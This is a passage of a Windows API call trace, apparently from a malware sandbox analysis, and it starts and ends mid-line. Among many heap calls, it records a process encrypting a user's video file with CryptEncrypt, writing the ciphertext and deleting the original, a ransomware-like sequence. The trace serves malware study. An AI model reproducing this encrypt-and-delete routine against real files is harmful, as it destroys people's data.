hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0213.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0213.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0213.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0213.803] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0213.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0213.803] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0213.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2acc1d8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0213.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0213.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0213.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab710, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.807] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xeca2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xeca8) returned 1 [0213.807] CharLowerBuffW (in: lpsz="byte[60584]", cchLength=0xb | out: lpsz="byte[60584]") returned 0xb [0213.809] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.809] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab440, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.810] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2acc1d8*, pdwDataLen=0x8cef60*=0xeca2, dwBufLen=0xeca8 | out: pbData=0x2acc1d8*, pdwDataLen=0x8cef60*=0xeca8) returned 1 [0213.815] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.815] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.815] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.815] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.815] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.815] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.820] WriteFile (in: hFile=0x468, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xeca8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xeca8, lpOverlapped=0x0) returned 1 [0213.822] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0213.822] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0213.822] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.822] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab4a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0213.822] CryptDestroyKey (hKey=0x9e2238) returned 1 [0213.822] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.822] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.823] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0213.823] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0213.823] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.823] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.823] FreeLibrary (hLibModule=0x76390000) returned 1 [0213.824] CloseHandle (hObject=0x520) returned 1 [0213.825] CloseHandle (hObject=0x468) returned 1 [0213.828] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.828] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.828] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/RV_dV0DIDgvgK.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi", lpFilePart=0x8cedf4*="RV_dV0DIDgvgK.avi") returned 0x28 [0213.828] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\rv_dv0didgvgk.avi")) returned 0x20 [0213.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7417b320, ftCreationTime.dwHighDateTime=0x1d5cad6, ftLastAccessTime.dwLowDateTime=0x758ee910, ftLastAccessTime.dwHighDateTime=0x1d5d406, ftLastWriteTime.dwLowDateTime=0x758ee910, ftLastWriteTime.dwHighDateTime=0x1d5d406, nFileSizeHigh=0x0, nFileSizeLow=0xeca2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RV_dV0DIDgvgK.avi", cAlternateFileName="RV_DV0~1.AVI")) returned 0x9e1bf8 [0213.829] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\RV_dV0DIDgvgK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\rv_dv0didgvgk.avi")) returned 1 [0213.831] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7417b320, ftCreationTime.dwHighDateTime=0x1d5cad6, ftLastAccessTime.dwLowDateTime=0x758ee910, ftLastAccessTime.dwHighDateTime=0x1d5d406, ftLastWriteTime.dwLowDateTime=0x758ee910, ftLastWriteTime.dwHighDateTime=0x1d5d406, nFileSizeHigh=0x0, nFileSizeLow=0xeca2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RV_dV0DIDgvgK.avi", cAlternateFileName="RV_DV0~1.AVI")) returned 0 [0213.831] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0213.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0213.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.831] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0213.832] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0213.832] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0213.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d28 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0213.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0213.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: 